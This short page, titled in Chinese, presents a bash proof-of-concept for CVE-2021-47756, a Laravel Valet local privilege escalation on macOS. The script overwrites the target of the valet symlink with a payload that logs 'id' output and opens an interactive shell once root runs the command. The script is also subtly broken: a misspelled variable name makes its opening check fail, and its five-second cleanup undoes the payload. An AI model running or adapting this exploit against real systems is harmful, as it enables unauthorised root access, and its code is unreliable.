CVE-2021-47756 Laravel Valet 本地权限提升漏洞

#!/bin/bash # CVE-2021-47756 Laravel Valet Local Privilege Escalation PoC # Usage: Run this script as a local user on a macOS system with Laravel Valet installed VAlET_PATH="/usr/local/bin/valet" BACKUP_FILE="/tmp/valet_backup_$$" # Check if valet command exists if [ ! -L "$VALET_PATH" ]; then echo "[-] Laravel Valet not found or not installed" exit 1 fi # Get the actual symlink target SYMLINK_TARGET=$(readlink "$VALET_PATH") echo "[+] Found valet symlink pointing to: $SYMLINK_TARGET" # Backup original file cp "$SYMLINK_TARGET" "$BACKUP_FILE" echo "[+] Backed up original file to: $BACKUP_FILE" # Create malicious payload echo '#!/bin/bash echo "[+] Privilege Escalation Successful!" id > /tmp/pwned_$(date +%s).txt bash -i' > "$SYMLINK_TARGET" chmod +x "$SYMLINK_TARGET" echo "[+] Modified valet command with malicious payload" # Trigger the vulnerability (requires sudo or root execution) echo "[!] Please wait for root user to execute 'valet' command..." echo "[!] Or manually run: sudo valet" echo "[+] Check /tmp/pwned_*.txt for proof of execution" # Restore original file (cleanup) sleep 5 cp "$BACKUP_FILE" "$SYMLINK_TARGET" rm -f "$BACKUP_FILE" echo "[+] Cleaned up - restored original file"